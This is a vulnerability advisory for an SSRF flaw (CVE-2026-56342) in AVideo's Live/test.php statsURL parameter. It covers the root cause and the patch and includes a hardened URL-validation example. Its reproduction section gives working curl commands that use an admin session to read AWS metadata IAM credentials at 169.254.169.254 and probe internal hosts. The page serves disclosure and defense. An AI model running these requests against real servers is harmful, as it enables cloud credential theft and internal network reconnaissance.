VYPR
Unrated severity · NVD Advisory · Published Jun 20, 2026

AVideo - Server-Side Request Forgery in Live/test.php via statsURL Parameter

CVE-2026-56342

Description

AVideo through version 27.0 contains a server-side request forgery vulnerability in plugin/Live/test.php that allows authenticated administrators to read arbitrary URLs via the statsURL parameter, which lacks isSSRFSafeURL() validation and accepts requests to private IP ranges and cloud metadata endpoints. Attackers can exploit this by crafting requests to internal services, cloud metadata endpoints like 169.254.169.254, and localhost to retrieve sensitive information including IAM credentials, internal service responses, and network configuration details.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.


Vulnerability mechanics

Root cause

"Missing isSSRFSafeURL() validation in plugin/Live/test.php allows server-side request forgery to internal and cloud metadata endpoints."

Attack vector

An authenticated administrator sends a GET request to `plugin/Live/test.php` with a `statsURL` parameter pointing to an internal or cloud metadata endpoint (e.g., `http://169.254.169.254/latest/meta-data/iam/security-credentials/`). The endpoint only checks that the URL starts with `http` via a regex and does not invoke `isSSRFSafeURL()` [ref_id=1], so it fetches and returns the full response from private IP ranges, localhost, or cloud metadata services. This allows the attacker to read IAM credentials, internal service responses, and network configuration. The lack of CSRF token validation also makes the endpoint susceptible to cross-site request forgery [ref_id=1].

Affected code

The vulnerable endpoint is `plugin/Live/test.php`. The `statsURL` parameter is taken from `$_REQUEST` (line 11) and only validated with a trivial `/^http/` regex before being passed to `file_get_contents()`, `curl_exec()`, or `wget()` — none of which call the existing `isSSRFSafeURL()` function defined in `objects/functions.php:4025`. SSL verification is also disabled in both the stream context and the curl handler.

What the fix does

The patch adds a call to `isSSRFSafeURL()` after the existing regex check in `plugin/Live/test.php`, so URLs pointing to private/reserved IP ranges (127.0.0.0/8, 10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16, 169.254.0.0/16, and IPv6 equivalents) are rejected before any fetch is attempted [ref_id=1]. Additionally, SSL verification is re-enabled in both the `file_get_contents` stream context and the `curl` handler, preventing man-in-the-middle attacks against HTTPS targets.
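To make the gate the patch introduces concrete, here is an added example (written for this page, not AVideo's `isSSRFSafeURL()` or any code from the project): the original `/^http/` check beside a hardened checker that rejects the ranges listed above. It goes slightly beyond the advisory by unwrapping IPv4-mapped IPv6 literals and by checking every DNS record of a hostname; `BLOCKED_NETWORKS`, `default_resolve` and the injectable `resolve` hook are assumptions.

```python
import ipaddress
import re
import socket
from urllib.parse import urlsplit

# Ranges the advisory says the fix rejects, plus the IPv6 counterparts
# (loopback, unique-local, link-local) as an assumption of what "IPv6 equivalents" covers.
BLOCKED_NETWORKS = [ipaddress.ip_network(n) for n in (
    "127.0.0.0/8", "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "169.254.0.0/16",
    "::1/128", "fc00::/7", "fe80::/10",
)]


def vulnerable_check(url: str) -> bool:
    """The gate the advisory describes in the unpatched test.php: only 'starts with http'."""
    return re.match(r"^http", url) is not None


def is_blocked_ip(ip: str) -> bool:
    """True if the address falls in a private/reserved range (IPv4-mapped IPv6 unwrapped first)."""
    addr = ipaddress.ip_address(ip)
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped  # ::ffff:10.0.0.1 must be judged as 10.0.0.1
    return any(addr in net for net in BLOCKED_NETWORKS)


def default_resolve(host: str) -> list:
    """Resolve a hostname to every A/AAAA record; each record is checked, not just the first."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def is_ssrf_safe_url(url: str, resolve=default_resolve) -> bool:
    """Hardened gate (hypothetical; not AVideo's isSSRFSafeURL()): a real http(s) scheme, a host,
    and no resolved address in a blocked range. `resolve` is injectable so tests run offline."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return False
    try:
        targets = [str(ipaddress.ip_address(parts.hostname))]  # literal IP, incl. [::1]
    except ValueError:
        try:
            targets = resolve(parts.hostname)  # hostname: check what it actually points at
        except OSError:
            return False
    # An unresolvable host is rejected, and one bad record among several is enough to reject.
    # The fetch resolves DNS again, so redirects and rebinding still need separate handling.
    return bool(targets) and not any(is_blocked_ip(ip) for ip in targets)
```

Apply the same check to every redirect target and, where the HTTP client allows it, pin the connection to the validated address, since the checker and the fetcher otherwise resolve DNS independently.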

Preconditions

  • Auth: Attacker must have a valid admin session cookie
  • Network: Target AVideo server must be reachable over the network
  • Input: The statsURL parameter must be accepted via GET or POST

Reproduction

Step 1: Authenticate as admin and obtain session cookie

```
PHPSESSID=$(curl -s -c - 'https://target.com/objects/userLogin.json.php' \
  -d 'user=admin&pass=adminpass' | grep PHPSESSID | awk '{print $7}')
```

Step 2: Read AWS cloud metadata (IAM credentials)

```
curl -b "PHPSESSID=${PHPSESSID}" \
  'https://target.com/plugin/Live/test.php?statsURL=http://169.254.169.254/latest/meta-data/iam/security-credentials/'
```

Step 3: Read IAM credentials for a specific role

```
curl -b "PHPSESSID=${PHPSESSID}" \
  'https://target.com/plugin/Live/test.php?statsURL=http://169.254.169.254/latest/meta-data/iam/security-credentials/MyRole'
```

Step 4: Scan internal services

```
curl -b "PHPSESSID=${PHPSESSID}" \
  'https://target.com/plugin/Live/test.php?statsURL=http://192.168.1.1:8080/'
```

Generated on Jun 21, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
